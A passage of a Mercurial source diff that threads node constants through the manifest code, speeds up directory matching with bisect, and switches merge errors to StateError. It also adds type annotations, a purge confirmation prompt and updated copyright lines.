def _iterativediff(t1, t2, stack):
"""compares two tree manifests and append new tree-manifests which
@@ -1368,7 +1373,7 @@
self._load() # for consistency; should never have any effect here
m1._load()
m2._load()
- emptytree = treemanifest()
+ emptytree = treemanifest(self.nodeconstants)
def getnode(m, d):
ld = m._lazydirs.get(d)
@@ -1551,6 +1556,7 @@
def __init__(
self,
+ nodeconstants,
opener,
tree=b'',
dirlogcache=None,
@@ -1567,6 +1573,7 @@
option takes precedence, so if it is set to True, we ignore whatever
value is passed in to the constructor.
"""
+ self.nodeconstants = nodeconstants
# During normal operations, we expect to deal with not more than four
# revs at a time (such as during commit --amend). When rebasing large
# stacks of commits, the number can go up, hence the config knob below.
@@ -1610,6 +1617,7 @@
self.index = self._revlog.index
self.version = self._revlog.version
self._generaldelta = self._revlog._generaldelta
+ self._revlog.revlog_kind = b'manifest'
def _setupmanifestcachehooks(self, repo):
"""Persist the manifestfulltextcache on lock release"""
@@ -1653,7 +1661,11 @@
assert self._treeondisk
if d not in self._dirlogcache:
mfrevlog = manifestrevlog(
- self.opener, d, self._dirlogcache, treemanifest=self._treeondisk
+ self.nodeconstants,
+ self.opener,
+ d,
+ self._dirlogcache,
+ treemanifest=self._treeondisk,
)
self._dirlogcache[d] = mfrevlog
return self._dirlogcache[d]
@@ -1704,9 +1716,10 @@
arraytext, deltatext = m.fastdelta(self.fulltextcache[p1], work)
cachedelta = self._revlog.rev(p1), deltatext
text = util.buffer(arraytext)
- n = self._revlog.addrevision(
+ rev = self._revlog.addrevision(
text, transaction, link, p1, p2, cachedelta
)
+ n = self._revlog.node(rev)
except FastdeltaUnavailable:
# The first parent manifest isn't already loaded or the
# manifest implementation doesn't support fastdelta, so
@@ -1724,7 +1737,8 @@
arraytext = None
else:
text = m.text()
- n = self._revlog.addrevision(text, transaction, link, p1, p2)
+ rev = self._revlog.addrevision(text, transaction, link, p1, p2)
+ n = self._revlog.node(rev)
arraytext = bytearray(text)
if arraytext is not None:
@@ -1765,9 +1779,10 @@
n = m2.node()
if not n:
- n = self._revlog.addrevision(
+ rev = self._revlog.addrevision(
text, transaction, link, m1.node(), m2.node()
)
+ n = self._revlog.node(rev)
# Save nodeid so parent manifest can calculate its nodeid
m.setnode(n)
@@ -1822,6 +1837,7 @@
revisiondata=False,
assumehaveparentrevisions=False,
deltamode=repository.CG_DELTAMODE_STD,
+ sidedata_helpers=None,
):
return self._revlog.emitrevisions(
nodes,
@@ -1829,6 +1845,7 @@
revisiondata=revisiondata,
assumehaveparentrevisions=assumehaveparentrevisions,
deltamode=deltamode,
+ sidedata_helpers=sidedata_helpers,
)
def addgroup(
@@ -1836,6 +1853,7 @@
deltas,
linkmapper,
transaction,
+ alwayscache=False,
addrevisioncb=None,
duplicaterevisioncb=None,
):
@@ -1843,6 +1861,7 @@
deltas,
linkmapper,
transaction,
+ alwayscache=alwayscache,
addrevisioncb=addrevisioncb,
duplicaterevisioncb=duplicaterevisioncb,
)
@@ -1909,6 +1928,7 @@
they receive (i.e. tree or flat or lazily loaded, etc)."""
def __init__(self, opener, repo, rootstore, narrowmatch):
+ self.nodeconstants = repo.nodeconstants
usetreemanifest = False
cachesize = 4
@@ -1947,7 +1967,7 @@
if not self._narrowmatch.always():
if not self._narrowmatch.visitdir(tree[:-1]):
- return excludeddirmanifestctx(tree, node)
+ return excludeddirmanifestctx(self.nodeconstants, tree, node)
if tree:
if self._rootstore._treeondisk:
if verify:
@@ -2110,7 +2130,7 @@
def __init__(self, manifestlog, dir=b''):
self._manifestlog = manifestlog
self._dir = dir
- self._treemanifest = treemanifest()
+ self._treemanifest = treemanifest(manifestlog.nodeconstants)
def _storage(self):
return self._manifestlog.getstorage(b'')
@@ -2160,17 +2180,19 @@
narrowmatch = self._manifestlog._narrowmatch
if not narrowmatch.always():
if not narrowmatch.visitdir(self._dir[:-1]):
- return excludedmanifestrevlog(self._dir)
+ return excludedmanifestrevlog(
+ self._manifestlog.nodeconstants, self._dir
+ )
return self._manifestlog.getstorage(self._dir)
def read(self):
if self._data is None:
store = self._storage()
if self._node == nullid:
- self._data = treemanifest()
+ self._data = treemanifest(self._manifestlog.nodeconstants)
# TODO accessing non-public API
elif store._treeondisk:
- m = treemanifest(dir=self._dir)
+ m = treemanifest(self._manifestlog.nodeconstants, dir=self._dir)
def gettext():
return store.revision(self._node)
@@ -2190,7 +2212,9 @@
text = store.revision(self._node)
arraytext = bytearray(text)
store.fulltextcache[self._node] = arraytext
- self._data = treemanifest(dir=self._dir, text=text)
+ self._data = treemanifest(
+ self._manifestlog.nodeconstants, dir=self._dir, text=text
+ )
return self._data
@@ -2227,7 +2251,7 @@
r0 = store.deltaparent(store.rev(self._node))
m0 = self._manifestlog.get(self._dir, store.node(r0)).read()
m1 = self.read()
- md = treemanifest(dir=self._dir)
+ md = treemanifest(self._manifestlog.nodeconstants, dir=self._dir)
for f, ((n0, fl0), (n1, fl1)) in pycompat.iteritems(m0.diff(m1)):
if n1:
md[f] = n1
@@ -2270,8 +2294,8 @@
whose contents are unknown.
"""
- def __init__(self, dir, node):
- super(excludeddir, self).__init__(dir)
+ def __init__(self, nodeconstants, dir, node):
+ super(excludeddir, self).__init__(nodeconstants, dir)
self._node = node
# Add an empty file, which will be included by iterators and such,
# appearing as the directory itself (i.e. something like "dir/")
@@ -2290,12 +2314,13 @@
class excludeddirmanifestctx(treemanifestctx):
"""context wrapper for excludeddir - see that docstring for rationale"""
- def __init__(self, dir, node):
+ def __init__(self, nodeconstants, dir, node):
+ self.nodeconstants = nodeconstants
self._dir = dir
self._node = node
def read(self):
- return excludeddir(self._dir, self._node)
+ return excludeddir(self.nodeconstants, self._dir, self._node)
def readfast(self, shallow=False):
# special version of readfast since we don't have underlying storage
@@ -2317,7 +2342,8 @@
outside the narrowspec.
"""
- def __init__(self, dir):
+ def __init__(self, nodeconstants, dir):
+ self.nodeconstants = nodeconstants
self._dir = dir
def __len__(self):
--- a/mercurial/match.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/match.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,12 +1,13 @@
# match.py - filename matching
#
-# Copyright 2008, 2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2008, 2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from __future__ import absolute_import, print_function
+import bisect
import copy
import itertools
import os
@@ -798,14 +799,38 @@
def visitdir(self, dir):
return dir in self._dirs
+ @propertycache
+ def _visitchildrenset_candidates(self):
+ """A memoized set of candidates for visitchildrenset."""
+ return self._fileset | self._dirs - {b''}
+
+ @propertycache
+ def _sorted_visitchildrenset_candidates(self):
+ """A memoized sorted list of candidates for visitchildrenset."""
+ return sorted(self._visitchildrenset_candidates)
+
def visitchildrenset(self, dir):
if not self._fileset or dir not in self._dirs:
return set()
- candidates = self._fileset | self._dirs - {b''}
- if dir != b'':
+ if dir == b'':
+ candidates = self._visitchildrenset_candidates
+ else:
+ candidates = self._sorted_visitchildrenset_candidates
d = dir + b'/'
- candidates = {c[len(d) :] for c in candidates if c.startswith(d)}
+ # Use bisect to find the first element potentially starting with d
+ # (i.e. >= d). This should always find at least one element (we'll
+ # assert later if this is not the case).
+ first = bisect.bisect_left(candidates, d)
+ # We need a representation of the first element that is > d that
+ # does not start with d, so since we added a `/` on the end of dir,
+ # we'll add whatever comes after slash (we could probably assume
+ # that `0` is after `/`, but let's not) to the end of dir instead.
+ dnext = dir + encoding.strtolocal(chr(ord(b'/') + 1))
+ # Use bisect to find the first element >= d_next
+ last = bisect.bisect_left(candidates, dnext, lo=first)
+ dlen = len(d)
+ candidates = {c[dlen:] for c in candidates[first:last]}
# self._dirs includes all of the directories, recursively, so if
# we're attempting to match foo/bar/baz.txt, it'll have '', 'foo',
# 'foo/bar' in it. Thus we can safely ignore a candidate that has a
--- a/mercurial/mdiff.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/mdiff.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# mdiff.py - diff and patch routines for mercurial
#
-# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/merge.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/merge.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# merge.py - directory-level update/merge handling for Mercurial
#
-# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2006, 2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -234,7 +234,7 @@
else:
warn(_(b"%s: untracked file differs\n") % f)
if abortconflicts:
- raise error.Abort(
+ raise error.StateError(
_(
b"untracked files in working directory "
b"differ from files in requested revision"
@@ -342,7 +342,7 @@
for f in pmmf:
fold = util.normcase(f)
if fold in foldmap:
- raise error.Abort(
+ raise error.StateError(
_(b"case-folding collision between %s and %s")
% (f, foldmap[fold])
)
@@ -353,7 +353,7 @@
for fold, f in sorted(foldmap.items()):
if fold.startswith(foldprefix) and not f.startswith(unfoldprefix):
# the folded prefix matches but actual casing is different
- raise error.Abort(
+ raise error.StateError(
_(b"case-folding collision between %s and directory of %s")
% (lastfull, f)
)
@@ -505,7 +505,9 @@
if invalidconflicts:
for p in invalidconflicts:
repo.ui.warn(_(b"%s: is both a file and a directory\n") % p)
- raise error.Abort(_(b"destination manifest contains path conflicts"))
+ raise error.StateError(
+ _(b"destination manifest contains path conflicts")
+ )
def _filternarrowactions(narrowmatch, branchmerge, mresult):
@@ -1696,6 +1698,7 @@
tocomplete = []
for f, args, msg in mergeactions:
repo.ui.debug(b" %s: %s -> m (premerge)\n" % (f, msg))
+ ms.addcommitinfo(f, {b'merged': b'yes'})
progress.increment(item=f)
if f == b'.hgsubstate': # subrepo states need updating
subrepoutil.submerge(
@@ -1711,6 +1714,7 @@
# merge
for f, args, msg in tocomplete:
repo.ui.debug(b" %s: %s -> m (merge)\n" % (f, msg))
+ ms.addcommitinfo(f, {b'merged': b'yes'})
progress.increment(item=f, total=numupdates)
ms.resolve(f, wctx)
@@ -1919,10 +1923,10 @@
### check phase
if not overwrite:
if len(pl) > 1:
- raise error.Abort(_(b"outstanding uncommitted merge"))
+ raise error.StateError(_(b"outstanding uncommitted merge"))
ms = wc.mergestate()
- if list(ms.unresolved()):
- raise error.Abort(
+ if ms.unresolvedcount():
+ raise error.StateError(
_(b"outstanding merge conflicts"),
hint=_(b"use 'hg resolve' to resolve"),
)
@@ -2008,7 +2012,7 @@
if mresult.hasconflicts():
msg = _(b"conflicting changes")
hint = _(b"commit or update --clean to discard changes")
- raise error.Abort(msg, hint=hint)
+ raise error.StateError(msg, hint=hint)
# Prompt and create actions. Most of this is in the resolve phase
# already, but we can't handle .hgsubstate in filemerge or
@@ -2325,6 +2329,7 @@
removefiles=True,
abortonerror=False,
noop=False,
+ confirm=False,
):
"""Purge the working directory of untracked files.
@@ -2345,6 +2350,8 @@
``noop`` controls whether to actually remove files. If not defined, actions
will be taken.
+ ``confirm`` ask confirmation before actually removing anything.
+
Returns an iterable of relative paths in the working directory that were
or would be removed.
"""
@@ -2372,6 +2379,35 @@
status = repo.status(match=matcher, ignored=ignored, unknown=unknown)
+ if confirm:
+ nb_ignored = len(status.ignored)
+ nb_unkown = len(status.unknown)
+ if nb_unkown and nb_ignored:
+ msg = _(b"permanently delete %d unkown and %d ignored files?")
+ msg %= (nb_unkown, nb_ignored)
+ elif nb_unkown:
+ msg = _(b"permanently delete %d unkown files?")
+ msg %= nb_unkown
+ elif nb_ignored:
+ msg = _(b"permanently delete %d ignored files?")
+ msg %= nb_ignored
+ elif removeemptydirs:
+ dir_count = 0
+ for f in directories:
+ if matcher(f) and not repo.wvfs.listdir(f):
+ dir_count += 1
+ if dir_count:
+ msg = _(
+ b"permanently delete at least %d empty directories?"
+ )
+ msg %= dir_count
+ else:
+ # XXX we might be missing directory there
+ return res
+ msg += b" (yN)$$ &Yes $$ &No"
+ if repo.ui.promptchoice(msg, default=1) == 1:
+ raise error.CanceledError(_(b'removal cancelled'))
+
if removefiles:
for f in sorted(status.unknown + status.ignored):
if not noop:
--- a/mercurial/mergestate.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/mergestate.py Tue Apr 20 11:01:06 2021 -0400
@@ -10,7 +10,7 @@
bin,
hex,
nullhex,
- nullid,
+ nullrev,
)
from . import (
error,
@@ -341,7 +341,7 @@
flo = fco.flags()
fla = fca.flags()
if b'x' in flags + flo + fla and b'l' not in flags + flo + fla:
- if fca.node() == nullid and flags != flo:
+ if fca.rev() == nullrev and flags != flo:
if preresolve:
self._repo.ui.warn(
_(
@@ -382,7 +382,6 @@
if merge_ret is None:
# If return value of merge is None, then there are no real conflict
del self._state[dfile]
- self._stateextras.pop(dfile, None)
self._dirty = True
elif not merge_ret:
self.mark(dfile, MERGE_RECORD_RESOLVED)
--- a/mercurial/mergeutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/mergeutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# mergeutil.py - help for merge processing in mercurial
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -13,7 +13,7 @@
def checkunresolved(ms):
- if list(ms.unresolved()):
+ if ms.unresolvedcount():
raise error.StateError(
_(b"unresolved merge conflicts (see 'hg help resolve')")
)
--- a/mercurial/metadata.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/metadata.py Tue Apr 20 11:01:06 2021 -0400
@@ -18,6 +18,7 @@
from . import (
error,
pycompat,
+ requirements as requirementsmod,
util,
)
@@ -321,12 +322,12 @@
│ (Some, None) │ OR │🄻 Deleted │ ø │ ø │
│ │🄷 Deleted[1] │ │ │ │
├──────────────┼──────────────┼──────────────┼──────────────┼──────────────┤
- │ │🄸 No Changes │ │ │ │
- │ (None, Some) │ OR │ ø │🄼 Added │🄽 Merged │
+ │ │🄸 No Changes │ │ │ 🄽 Touched │
+ │ (None, Some) │ OR │ ø │🄼 Added │OR 🅀 Salvaged │
│ │🄹 Salvaged[2]│ │ (copied?) │ (copied?) │
├──────────────┼──────────────┼──────────────┼──────────────┼──────────────┤
- │ │ │ │ │ │
- │ (Some, Some) │🄺 No Changes │ ø │🄾 Merged │🄿 Merged │
+ │ │ │ │ 🄾 Touched │ 🄿 Merged │
+ │ (Some, Some) │🄺 No Changes │ ø │OR 🅁 Salvaged │OR 🅂 Touched │
│ │ [3] │ │ (copied?) │ (copied?) │
└──────────────┴──────────────┴──────────────┴──────────────┴──────────────┘
@@ -414,6 +415,7 @@
nice bonus. However do not any of this yet.
"""
+ repo = ctx.repo()
md = ChangingFiles()
m = ctx.manifest()
@@ -453,8 +455,23 @@
# case 🄻 — both deleted the file.
md.mark_removed(filename)
elif d1[1][0] is not None and d2[1][0] is not None:
- # case 🄽 🄾 🄿
- md.mark_merged(filename)
+ if d1[0][0] is None or d2[0][0] is None:
+ if any(_find(ma, filename) is not None for ma in mas):
+ # case 🅀 or 🅁
+ md.mark_salvaged(filename)
+ else:
+ # case 🄽 🄾 : touched
+ md.mark_touched(filename)
+ else:
+ fctx = repo.filectx(filename, fileid=d1[1][0])
+ if fctx.p2().rev() == nullrev:
+ # case 🅂
+ # lets assume we can trust the file history. If the
+ # filenode is not a merge, the file was not merged.
+ md.mark_touched(filename)
+ else:
+ # case 🄿
+ md.mark_merged(filename)
copy_candidates.append(filename)
else:
# Impossible case, the post-merge file status cannot be None on
@@ -804,6 +821,21 @@
return encode_files_sidedata(files), files.has_copies_info
+def copies_sidedata_computer(repo, revlog, rev, existing_sidedata):
+ return _getsidedata(repo, rev)[0]
+
+
+def set_sidedata_spec_for_repo(repo):
+ if requirementsmod.COPIESSDC_REQUIREMENT in repo.requirements:
+ repo.register_wanted_sidedata(sidedatamod.SD_FILES)
+ repo.register_sidedata_computer(
+ b"changelog",
+ sidedatamod.SD_FILES,
+ (sidedatamod.SD_FILES,),
+ copies_sidedata_computer,
+ )
+
+
def getsidedataadder(srcrepo, destrepo):
use_w = srcrepo.ui.configbool(b'experimental', b'worker.repository-upgrade')
if pycompat.iswindows or not use_w:
@@ -882,14 +914,14 @@
data = {}, False
if util.safehasattr(revlog, b'filteredrevs'): # this is a changelog
# Is the data previously shelved ?
- sidedata = staging.pop(rev, None)
- if sidedata is None:
+ data = staging.pop(rev, None)
+ if data is None:
# look at the queued result until we find the one we are lookig
# for (shelve the other ones)
r, data = sidedataq.get()
while r != rev:
staging[r] = data
- r, sidedata = sidedataq.get()
+ r, data = sidedataq.get()
tokens.release()
sidedata, has_copies_info = data
new_flag = 0
--- a/mercurial/minirst.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/minirst.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# minirst.py - minimal reStructuredText parser
#
-# Copyright 2009, 2010 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2009, 2010 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -158,7 +158,7 @@
_optionre = re.compile(
br'^(-([a-zA-Z0-9]), )?(--[a-z0-9-]+)' br'((.*) +)(.*)$'
)
-_fieldre = re.compile(br':(?![: ])([^:]*)(?<! ):[ ]+(.*)')
+_fieldre = re.compile(br':(?![: ])((?:\:|[^:])*)(?<! ):[ ]+(.*)')
_definitionre = re.compile(br'[^ ]')
_tablere = re.compile(br'(=+\s+)*=+')
@@ -229,7 +229,7 @@
m = _fieldre.match(blocks[j][b'lines'][0])
key, rest = m.groups()
blocks[j][b'lines'][0] = rest
- blocks[j][b'key'] = key
+ blocks[j][b'key'] = key.replace(br'\:', b':')
j += 1
i = j + 1
--- a/mercurial/mpatch.c Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/mpatch.c Tue Apr 20 11:01:06 2021 -0400
@@ -14,7 +14,7 @@
allocation of intermediate Python objects. Working memory is about 2x
the total number of hunks.
- Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+ Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
This software may be used and distributed according to the terms
of the GNU General Public License, incorporated herein by reference.
--- a/mercurial/narrowspec.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/narrowspec.py Tue Apr 20 11:01:06 2021 -0400
@@ -329,7 +329,6 @@
trackeddirty = status.modified + status.added
clean = status.clean
if assumeclean:
- assert not trackeddirty
clean.extend(lookup)
else:
trackeddirty.extend(lookup)
--- a/mercurial/node.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/node.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# node.py - basic nodeid manipulation for mercurial
#
-# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -21,29 +21,48 @@
raise TypeError(e)
-nullrev = -1
-# In hex, this is '0000000000000000000000000000000000000000'
-nullid = b"\0" * 20
-nullhex = hex(nullid)
+def short(node):
+ return hex(node[:6])
+
-# Phony node value to stand-in for new files in some uses of
-# manifests.
-# In hex, this is '2121212121212121212121212121212121212121'
-newnodeid = b'!!!!!!!!!!!!!!!!!!!!'
-# In hex, this is '3030303030303030303030303030306164646564'
-addednodeid = b'000000000000000added'
-# In hex, this is '3030303030303030303030306d6f646966696564'
-modifiednodeid = b'000000000000modified'
+nullrev = -1
-wdirfilenodeids = {newnodeid, addednodeid, modifiednodeid}
-
-# pseudo identifiers for working directory
-# (they are experimental, so don't add too many dependencies on them)
+# pseudo identifier for working directory
+# (experimental, so don't add too many dependencies on it)
wdirrev = 0x7FFFFFFF
-# In hex, this is 'ffffffffffffffffffffffffffffffffffffffff'
-wdirid = b"\xff" * 20
-wdirhex = hex(wdirid)
-def short(node):
- return hex(node[:6])
+class sha1nodeconstants(object):
+ nodelen = 20
+
+ # In hex, this is '0000000000000000000000000000000000000000'
+ nullid = b"\0" * nodelen
+ nullhex = hex(nullid)
+
+ # Phony node value to stand-in for new files in some uses of
+ # manifests.
+ # In hex, this is '2121212121212121212121212121212121212121'
+ newnodeid = b'!!!!!!!!!!!!!!!!!!!!'
+ # In hex, this is '3030303030303030303030303030306164646564'
+ addednodeid = b'000000000000000added'
+ # In hex, this is '3030303030303030303030306d6f646966696564'
+ modifiednodeid = b'000000000000modified'
+
+ wdirfilenodeids = {newnodeid, addednodeid, modifiednodeid}
+
+ # pseudo identifier for working directory
+ # (experimental, so don't add too many dependencies on it)
+ # In hex, this is 'ffffffffffffffffffffffffffffffffffffffff'
+ wdirid = b"\xff" * nodelen
+ wdirhex = hex(wdirid)
+
+
+# legacy starting point for porting modules
+nullid = sha1nodeconstants.nullid
+nullhex = sha1nodeconstants.nullhex
+newnodeid = sha1nodeconstants.newnodeid
+addednodeid = sha1nodeconstants.addednodeid
+modifiednodeid = sha1nodeconstants.modifiednodeid
+wdirfilenodeids = sha1nodeconstants.wdirfilenodeids
+wdirid = sha1nodeconstants.wdirid
+wdirhex = sha1nodeconstants.wdirhex
--- a/mercurial/obsolete.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/obsolete.py Tue Apr 20 11:01:06 2021 -0400
@@ -560,10 +560,11 @@
# parents: (tuple of nodeid) or None, parents of predecessors
# None is used when no data has been recorded
- def __init__(self, svfs, defaultformat=_fm1version, readonly=False):
+ def __init__(self, repo, svfs, defaultformat=_fm1version, readonly=False):
# caches for various obsolescence related cache
self.caches = {}
self.svfs = svfs
+ self.repo = repo
self._defaultformat = defaultformat
self._readonly = readonly
@@ -806,7 +807,7 @@
if defaultformat is not None:
kwargs['defaultformat'] = defaultformat
readonly = not isenabled(repo, createmarkersopt)
- store = obsstore(repo.svfs, readonly=readonly, **kwargs)
+ store = obsstore(repo, repo.svfs, readonly=readonly, **kwargs)
if store and readonly:
ui.warn(
_(b'obsolete feature not enabled but %i markers found!\n')
--- a/mercurial/parser.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/parser.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# parser.py - simple top-down operator precedence parser for mercurial
#
-# Copyright 2010 Matt Mackall <mpm@selenic.com>
+# Copyright 2010 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/pathutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/pathutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -15,11 +15,21 @@
util,
)
+if pycompat.TYPE_CHECKING:
+ from typing import (
+ Any,
+ Callable,
+ Iterator,
+ Optional,
+ )
+
+
rustdirs = policy.importrust('dirstate', 'Dirs')
parsers = policy.importmod('parsers')
def _lowerclean(s):
+ # type: (bytes) -> bytes
return encoding.hfsignoreclean(s.lower())
@@ -59,6 +69,7 @@
self.normcase = lambda x: x
def __call__(self, path, mode=None):
+ # type: (bytes, Optional[Any]) -> None
"""Check the relative path.
path may contain a pattern (e.g. foodir/**.txt)"""
@@ -119,6 +130,7 @@
self.audited.add(normpath)
def _checkfs(self, prefix, path):
+ # type: (bytes, bytes) -> None
"""raise exception if a file system backed check fails"""
curpath = os.path.join(self.root, prefix)
try:
@@ -143,6 +155,7 @@
raise error.Abort(msg % (path, pycompat.bytestr(prefix)))
def check(self, path):
+ # type: (bytes) -> bool
try:
self(path)
return True
@@ -164,6 +177,7 @@
def canonpath(root, cwd, myname, auditor=None):
+ # type: (bytes, bytes, bytes, Optional[pathauditor]) -> bytes
"""return the canonical path of myname, given cwd and root
>>> def check(root, cwd, myname):
@@ -266,6 +280,7 @@
def normasprefix(path):
+ # type: (bytes) -> bytes
"""normalize the specified path as path prefix
Returned value can be used safely for "p.startswith(prefix)",
@@ -289,6 +304,7 @@
def finddirs(path):
+ # type: (bytes) -> Iterator[bytes]
pos = path.rfind(b'/')
while pos != -1:
yield path[:pos]
@@ -318,6 +334,7 @@
addpath(f)
def addpath(self, path):
+ # type: (bytes) -> None
dirs = self._dirs
for base in finddirs(path):
if base.endswith(b'/'):
@@ -330,6 +347,7 @@
dirs[base] = 1
def delpath(self, path):
+ # type: (bytes) -> None
dirs = self._dirs
for base in finddirs(path):
if dirs[base] > 1:
@@ -341,6 +359,7 @@
return iter(self._dirs)
def __contains__(self, d):
+ # type: (bytes) -> bool
return d in self._dirs
@@ -355,4 +374,4 @@
# rather not let our internals know that we're thinking in posix terms
# - instead we'll let them be oblivious.
join = posixpath.join
-dirname = posixpath.dirname
+dirname = posixpath.dirname # type: Callable[[bytes], bytes]
--- a/mercurial/phases.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/phases.py Tue Apr 20 11:01:06 2021 -0400
@@ -127,10 +127,32 @@
util,
)
+if pycompat.TYPE_CHECKING:
+ from typing import (
+ Any,
+ Callable,
+ Dict,
+ Iterable,
+ List,
+ Optional,
+ Set,
+ Tuple,
+ )
+ from . import (
+ localrepo,
+ ui as uimod,
+ )
+
+ Phaseroots = Dict[int, Set[bytes]]
+ Phasedefaults = List[
+ Callable[[localrepo.localrepository, Phaseroots], Phaseroots]
+ ]
+
+
_fphasesentry = struct.Struct(b'>i20s')
# record phase index
-public, draft, secret = range(3)
+public, draft, secret = range(3) # type: int
archived = 32 # non-continuous for compatibility
internal = 96 # non-continuous for compatibility
allphases = (public, draft, secret, archived, internal)
@@ -154,11 +176,13 @@
def supportinternal(repo):
+ # type: (localrepo.localrepository) -> bool
"""True if the internal phase can be used on a repository"""
return requirements.INTERNAL_PHASE_REQUIREMENT in repo.requirements
def _readroots(repo, phasedefaults=None):
+ # type: (localrepo.localrepository, Optional[Phasedefaults]) -> Tuple[Phaseroots, bool]
"""Read phase roots from disk
phasedefaults is a list of fn(repo, roots) callable, which are
@@ -191,6 +215,7 @@
def binaryencode(phasemapping):
+ # type: (Dict[int, List[bytes]]) -> bytes
"""encode a 'phase -> nodes' mapping into a binary stream
The revision lists are encoded as (phase, root) pairs.
@@ -203,6 +228,7 @@
def binarydecode(stream):
+ # type: (...) -> Dict[int, List[bytes]]
"""decode a binary stream into a 'phase -> nodes' mapping
The (phase, root) pairs are turned back into a dictionary with
@@ -321,6 +347,7 @@
class phasecache(object):
def __init__(self, repo, phasedefaults, _load=True):
+ # type: (localrepo.localrepository, Optional[Phasedefaults], bool) -> None
if _load:
# Cheap trick to allow shallow-copy without copy module
self.phaseroots, self.dirty = _readroots(repo, phasedefaults)
@@ -330,6 +357,7 @@
self.opener = repo.svfs
def hasnonpublicphases(self, repo):
+ # type: (localrepo.localrepository) -> bool
"""detect if there are revisions with non-public phase"""
repo = repo.unfiltered()
cl = repo.changelog
@@ -343,6 +371,7 @@
)
def nonpublicphaseroots(self, repo):
+ # type: (localrepo.localrepository) -> Set[bytes]
"""returns the roots of all non-public phases
The roots are not minimized, so if the secret revisions are
@@ -362,6 +391,8 @@
)
def getrevset(self, repo, phases, subset=None):
+ # type: (localrepo.localrepository, Iterable[int], Optional[Any]) -> Any
+ # TODO: finish typing this
"""return a smartset for the given phases"""
self.loadphaserevs(repo) # ensure phase's sets are loaded
phases = set(phases)
@@ -457,6 +488,7 @@
self._loadedrevslen = len(cl)
def loadphaserevs(self, repo):
+ # type: (localrepo.localrepository) -> None
"""ensure phase information is loaded in the object"""
if self._phasesets is None:
try:
@@ -470,6 +502,7 @@
self._phasesets = None
def phase(self, repo, rev):
+ # type: (localrepo.localrepository, int) -> int
# We need a repo argument here to be able to build _phasesets
# if necessary. The repository instance is not stored in
# phasecache to avoid reference cycles. The changelog instance
@@ -652,6 +685,7 @@
return False
def filterunknown(self, repo):
+ # type: (localrepo.localrepository) -> None
"""remove unknown nodes from the phase boundary
Nothing is lost as unknown nodes only hold data for their descendants.
@@ -729,6 +763,7 @@
def listphases(repo):
+ # type: (localrepo.localrepository) -> Dict[bytes, bytes]
"""List phases root for serialization over pushkey"""
# Use ordered dictionary so behavior is deterministic.
keys = util.sortdict()
@@ -760,6 +795,7 @@
def pushphase(repo, nhex, oldphasestr, newphasestr):
+ # type: (localrepo.localrepository, bytes, bytes, bytes) -> bool
"""List phases root for serialization over pushkey"""
repo = repo.unfiltered()
with repo.lock():
@@ -909,6 +945,7 @@
def newcommitphase(ui):
+ # type: (uimod.ui) -> int
"""helper to get the target phase of new commit
Handle all possible values for the phases.new-commit options.
@@ -924,11 +961,13 @@
def hassecret(repo):
+ # type: (localrepo.localrepository) -> bool
"""utility function that check if a repo have any secret changeset."""
return bool(repo._phasecache.phaseroots[secret])
def preparehookargs(node, old, new):
+ # type: (bytes, Optional[int], Optional[int]) -> Dict[bytes, bytes]
if old is None:
old = b''
else:
--- a/mercurial/posix.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/posix.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# posix.py - Posix utility function implementations for Mercurial
#
-# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/profiling.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/profiling.py Tue Apr 20 11:01:06 2021 -0400
@@ -228,7 +228,7 @@
if self._output == b'blackbox':
self._fp = util.stringio()
elif self._output:
